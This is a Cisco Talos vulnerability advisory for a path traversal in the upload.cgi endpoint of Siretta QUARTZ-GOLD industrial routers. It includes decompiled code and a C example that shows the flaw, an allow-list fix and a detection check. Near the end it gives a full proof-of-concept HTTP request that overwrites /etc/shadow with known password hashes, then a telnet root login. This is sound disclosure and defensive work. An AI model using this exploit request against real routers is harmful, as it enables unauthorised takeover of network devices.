CVE-2022-39045: TALOS-2022-1611 || Cisco Talos Intelligence Group
SUMMARY
A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
PRODUCT URLS
QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/
CVSSv3 SCORE
7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
DETAILS
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.
The QUARTZ-GOLD router has a web server with several functionalities, a subset of which relate to the management of external files: the web server offers an API for uploading files, downloading them, and deleting them when no longer required.
The upload.cgi endpoint allows a file to be uploaded. The following is one of the functions responsible for this API:
void input_upload.cgi(char *path,int len,char *boundary)
{
    [...]
    remaining_length_to_write = len;
    storage_udisk = nvram_get_int("storage_udisk");
    [... calculate base_folder and perform basic checks ...]
    else {
        [...]
        filename_param = (char *)webcgi_safeget("filename"); [1]
        filename = "";
        if (filename_param != (char *)0x0) {
            filename = filename_param;
        }
        sprintf(buff,"%s/%s",base_folder,filename); [2]
        fd = fopen(buff,"w"); [3]
        if (fd == (FILE *)0x0) {
            base_folder = "Unable to start pipe for mtd write";
        }
        else {
            [...]
            boundary_len = strlen(boundary);
            remaining_length_to_write = (remaining_length_to_write - 6) - boundary_len;
            while (0 < (int)remaining_length_to_write) {
                n_bytes_to_read = remaining_length_to_write;
                [...]
                n_bytes_read = web_read(buff,n_bytes_to_read);
                [...]
                remaining_length_to_write = remaining_length_to_write - n_bytes_read;
                bytes_written = safe_fwrite(buff,1,n_bytes_read,fd); [4]
                [...]
            }
This function fetches the specified filename at [1] and uses it to compose the file path at [2]. The composed file path is used at [3] to create or overwrite the file, and the uploaded content is then written into the just-created or overwritten file at [4]. Because no sanitization is performed on the filename parameter between [1] and [2], this function is vulnerable to path traversal. This allows an arbitrary file in the file system to be overwritten, which can lead to arbitrary command execution.
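To make the defect and its fix concrete, the following is an added example and not Siretta's code: it reproduces the vulnerable sprintf("%s/%s", ...) composition from the decompiled function next to a hardened version, and includes a small percent-decoder standing in for the CGI layer that decodes the query string before the handler sees "filename". The base folder "/mnt/udisk" is an assumed placeholder; the real value is computed by the firmware from the storage settings.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PATH_MAX_LEN 256

/* Minimal percent-decoder (stand-in for the CGI framework's own decoding).
 * Returns NULL on a malformed escape such as "%zz" or a truncated "%2". */
static const char *percent_decode(const char *in)
{
    static char out[PATH_MAX_LEN];
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        if (o + 1 >= sizeof out) return NULL;
        if (in[i] == '%') {
            char hex[3] = { in[i + 1], in[i + 1] ? in[i + 2] : '\0', '\0' };
            char *end;
            long v = strtol(hex, &end, 16);
            if (hex[0] == '\0' || hex[1] == '\0' || *end != '\0') return NULL;
            out[o++] = (char)v;
            i += 2;
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return out;
}

/* Mirrors the advisory's pattern at [2]: the decoded filename is joined onto
 * the base folder with no validation, so "../" segments walk out of it. */
static const char *compose_unsafe(const char *base_folder, const char *filename)
{
    static char path[PATH_MAX_LEN];
    int n = snprintf(path, sizeof path, "%s/%s", base_folder, filename);
    return (n > 0 && (size_t)n < sizeof path) ? path : NULL;
}

/* Allow-list the filename: one path component, conservative character set,
 * bounded length, and never starting with '.' (rejects ".", ".." and dotfiles). */
static int filename_is_safe(const char *filename)
{
    size_t len = strlen(filename);
    if (len == 0 || len > 64) return 0;
    if (filename[0] == '.') return 0;
    for (size_t i = 0; i < len; i++) {
        char c = filename[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '.' || c == '_' || c == '-';
        if (!ok) return 0;
    }
    return 1;
}

/* Hardened composition: validate first, then join. Returns NULL on rejection. */
static const char *compose_safe(const char *base_folder, const char *filename)
{
    if (!filename_is_safe(filename)) return NULL;
    return compose_unsafe(base_folder, filename);
}

/* Independent check usable as a second layer, or as a detection rule over
 * logged upload paths: 1 if the path is not under base_folder or contains
 * a ".." segment, 0 otherwise. */
static int path_escapes_base(const char *path, const char *base_folder)
{
    size_t blen = strlen(base_folder);
    if (strncmp(path, base_folder, blen) != 0 || path[blen] != '/') return 1;
    for (const char *p = path + blen + 1; *p; ) {
        const char *end = strchr(p, '/');
        size_t seglen = end ? (size_t)(end - p) : strlen(p);
        if (seglen == 2 && p[0] == '.' && p[1] == '.') return 1;
        if (!end) break;
        p = end + 1;
    }
    return 0;
}

int main(void)
{
    const char *base = "/mnt/udisk";                                /* assumed placeholder */
    const char *fn = percent_decode("..%2F..%2F..%2Fetc%2Fshadow"); /* value from the PoC request */
    const char *p = compose_unsafe(base, fn);
    printf("decoded filename : %s\n", fn);
    printf("unsafe compose   : %s (escapes base: %d)\n", p, path_escapes_base(p, base));
    printf("safe compose     : %s\n", compose_safe(base, fn) ? compose_safe(base, fn) : "(rejected)");
    printf("safe compose     : %s\n", compose_safe(base, "config-backup.bin"));
    return 0;
}
```

The allow-list approach is preferable to stripping "../" sequences, because a filter that only removes known-bad substrings can be bypassed with alternative encodings or by double-encoding; accepting a single, well-formed path component leaves nothing for the traversal to work with. The `path_escapes_base` check is deliberately independent of the allow-list so that it can also be applied to recorded upload paths when reviewing a device for abuse of this endpoint.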
Exploit Proof of Concept
Sending a request like the following:
POST /upload.cgi?_http_id=<the correct tid>&filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1
Authorization: Basic <a valid basic auth value>
Content-Length: 286
Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884
--906881afb7fae201f7f9962a229f9884
Content-Disposition: form-data; name="content"; filename="content"
root:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
admin:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
nobody:*:0:0:99999:7:0:0:
--906881afb7fae201f7f9962a229f9884--
If the request was successful, it is now possible to access the device using root:admin as credentials. For instance, when connecting over telnet to port 2323, we can provide the injected credentials:
❯ telnet 192.168.0.1 2323
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
QUARTZ-GOLD login: root
Password:
root@QUARTZ-GOLD:/tmp/home/root#
This effectively allows arbitrary command execution.
TIMELINE
2022-10-14 - Initial Vendor Contact
2022-10-20 - Vendor Disclosure
2022-11-24 - Vendor Patch Release
2023-01-26 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.